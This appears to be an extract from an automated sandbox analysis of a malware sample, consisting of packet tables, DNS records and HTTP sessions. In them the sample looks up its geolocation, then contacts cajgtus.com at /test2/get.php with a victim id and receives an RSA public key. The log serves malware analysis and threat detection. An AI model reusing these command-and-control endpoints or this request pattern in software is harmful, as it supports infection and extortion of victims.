                                                                                                Apr 24, 2024 15:57:08.918394089 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:09.257384062 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:09.257488012 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:09.269315004 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:09.269337893 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:09.270245075 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:09.270319939 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:09.272686958 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:09.320158005 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032408953 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032491922 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032510042 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032573938 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032582045 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032630920 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032638073 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032686949 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032694101 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:10.032707930 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032736063 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:10.032736063 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.410295963 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.410342932 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:17.410455942 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.442060947 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.442095041 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:17.779751062 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:17.780071974 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.788719893 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.788759947 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:17.789685965 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:17.789774895 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.795844078 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:17.836142063 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:18.548369884 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:18.548578024 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:18.548638105 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:18.548683882 CEST44349716104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:18.548705101 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:18.548773050 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:18.548937082 CEST49716443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:18.548966885 CEST44349716104.21.65.24192.168.2.5

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Apr 24, 2024 15:56:52.318264961 CEST5978253192.168.2.51.1.1.1
                                                                                                Apr 24, 2024 15:56:52.519283056 CEST53597821.1.1.1192.168.2.5
                                                                                                Apr 24, 2024 15:56:57.053822994 CEST5730353192.168.2.51.1.1.1
                                                                                                Apr 24, 2024 15:56:58.050657988 CEST5730353192.168.2.51.1.1.1
                                                                                                Apr 24, 2024 15:56:59.047894001 CEST5730353192.168.2.51.1.1.1
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST53573031.1.1.1192.168.2.5
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST53573031.1.1.1192.168.2.5
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST53573031.1.1.1192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Apr 24, 2024 15:56:52.318264961 CEST192.168.2.51.1.1.10xe57Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:57.053822994 CEST192.168.2.51.1.1.10xdc15Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:58.050657988 CEST192.168.2.51.1.1.10xdc15Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.047894001 CEST192.168.2.51.1.1.10xdc15Standard query (0)cajgtus.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Apr 24, 2024 15:56:52.519283056 CEST1.1.1.1192.168.2.50xe57No error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:52.519283056 CEST1.1.1.1192.168.2.50xe57No error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com62.150.232.50A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com201.103.73.225A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com189.134.88.74A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639703989 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com62.150.232.50A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com201.103.73.225A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com189.134.88.74A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639761925 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com62.150.232.50A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com201.103.73.225A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com189.134.88.74A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.2ip.ua
                                                                                                • cajgtus.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54970762.150.232.50802164C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Apr 24, 2024 15:57:00.032326937 CEST128OUTGET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: cajgtus.com
                                                                                                Apr 24, 2024 15:57:01.094676018 CEST764INHTTP/1.1 200 OK
                                                                                                Date: Wed, 24 Apr 2024 13:57:19 GMT
                                                                                                Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                X-Powered-By: PHP/5.6.40
                                                                                                Content-Length: 560
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 34 34 33 69 75 52 34 74 59 5a 62 4b 61 72 78 4c 67 32 55 5c 2f 5c 5c 6e 79 64 6f 66 34 67 72 33 50 79 67 46 34 42 45 75 57 30 49 69 70 65 52 73 38 59 32 4e 61 6a 37 4a 49 39 57 5a 2b 54 56 6d 4f 70 6d 61 64 50 62 63 52 2b 33 62 5c 2f 2b 4c 39 61 65 68 6d 2b 6b 78 6d 5c 5c 6e 76 4d 58 57 36 52 6d 68 6f 76 62 6c 32 4d 32 4a 48 71 6b 61 51 33 77 79 48 77 74 66 52 2b 5a 6e 47 4b 65 78 4d 5c 2f 76 55 2b 33 66 35 4a 67 64 76 64 61 59 45 69 6a 6f 5c 2f 34 70 41 4e 6b 4b 42 38 5c 5c 6e 52 32 53 42 33 63 37 32 74 5a 32 30 6d 6d 33 39 43 56 4c 4d 79 61 6e 38 6e 65 54 33 2b 33 67 72 64 71 58 39 7a 67 67 41 62 59 42 48 43 48 35 33 6a 51 4d 39 42 36 33 62 2b 44 37 37 72 73 77 48 5c 5c 6e 53 63 5c 2f 4c 45 6d 71 52 58 6f 6d 6a 77 37 4b 58 59 52 30 4a 52 46 35 44 66 6c 58 6d 6d 31 4a 42 61 4b 78 76 31 64 47 52 54 6f 38 77 74 49 30 79 35 54 74 7a 62 4a 66 7a 50 69 6e 6b 37 4c 33 39 5c 5c 6e 45 75 4b 42 70 41 52 4c 67 33 67 5a 65 57 39 36 64 54 35 73 41 37 43 38 69 76 4d 78 72 48 31 56 42 57 41 36 4d 67 69 45 43 4d 73 31 6d 42 48 58 70 5c 2f 6c 4e 64 4a 68 4b 75 38 58 58 33 58 46 77 5c 5c 6e 42 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 38 4a 48 32 37 57 64 72 57 36 6b 75 46 6b 53 36 55 77 47 39 59 75 36 4b 52 30 44 56 69 76 35 4a 79 56 6d 4b 4f 6f 4b 45 22 7d
                                                                                                Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549704104.21.65.244432716C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-24 13:56:52 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:56:53 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2FQ5Y%2FhZNerCVznLkKnAcnqGQZPd0dFf1847VhwoDd6OmNI2qqCsl1MpTPnVN4XHdx4Y2n9QbSwzgNPQlZR7mr00TvC0zZs3FDnF7atUZbo8pMksDLW%2BZ%2BhA6p3t"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699682c062a91-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:56:53 UTC455INData Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 65 37 38 66 38 32 38 62 39 37 61 37 64 35 38 65 39 37 63 39 38 61 38 32 64 38 39 34 39 32 38 35 38 64 38 32 38 34
                                                                                                Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#e78f828b97a7d58e97c98a82d89492858d8284
                                                                                                2024-04-24 13:56:53 UTC367INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 39 62 31 62 63 62 35 61 39 39 39 65 62 62 30 61 39 66 37 61 63 62 38 65 36 61 61 61 63 62 62 62 33 62 63 62 61 61 64 65 34 65 62 62 30 61 39 66 37 61 63 62 38
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#d9b1bcb5a999ebb0a9f7acb8e6aaacbbb3bcbaade4ebb0a9f7acb8
                                                                                                2024-04-24 13:56:53 UTC114INData Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
                                                                                                2024-04-24 13:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549705104.21.65.244435968C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-24 13:56:54 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:56:55 UTC912INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GYBv0vm7bIGtuASyb%2FIleWMH0CcIrUpOzqfEqQtqUX0x%2BmhGHHGeBSJEsD6QzjVs9SnIY6Dfmqm1KBShXw5b8eWg03JEn%2BblwDuteSRRpThuATLte8CeOn9LJIT"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699753b0f2b65-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:56:55 UTC457INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 39 38 66 30 66 64 66 34 65 38 64 38 61 61 66 31 65 38 62 36 66 35 66 64 61 37 65 62 65 64 66 61 66 32 66 64 66 62
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#98f0fdf4e8d8aaf1e8b6f5fda7ebedfaf2fdfb
                                                                                                2024-04-24 13:56:55 UTC473INData Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 66 35 37 35 61 35 33 34 66 37 66 30 64 35 36 34 66 31 31 34 61 35 65 30 30 34 63 34 61 35 64 35 35 35 61 35 63 34 62 30 32 30 64 35 36 34 66 31 31 34 61 35 65 22 3e
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#3f575a534f7f0d564f114a5e004c4a5d555a5c4b020d564f114a5e">
                                                                                                2024-04-24 13:56:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549706104.21.65.244432164C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-24 13:56:56 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:56:56 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:56 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZsxfobyLzVYSt6X3NZtaCostgxIQrKGVqUnMd0XCtewhsxeT5r20l3de%2Ff6dH5xY8E%2B3KN0MgM9nQBlerzwYgnMFQ4ZmhflFyMrdgwq%2BhI%2FQYJ92Gk0xWueKseW"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8796997ceb822ac7-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:56:56 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 38 39 30 39 64 39 34 38 38 62 38 63 61 39 31 38 38 64 36 39 35 39 64 63 37 38 62 38 64 39 61 39 32 39 64 39 62
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#f8909d9488b8ca9188d6959dc78b8d9a929d9b
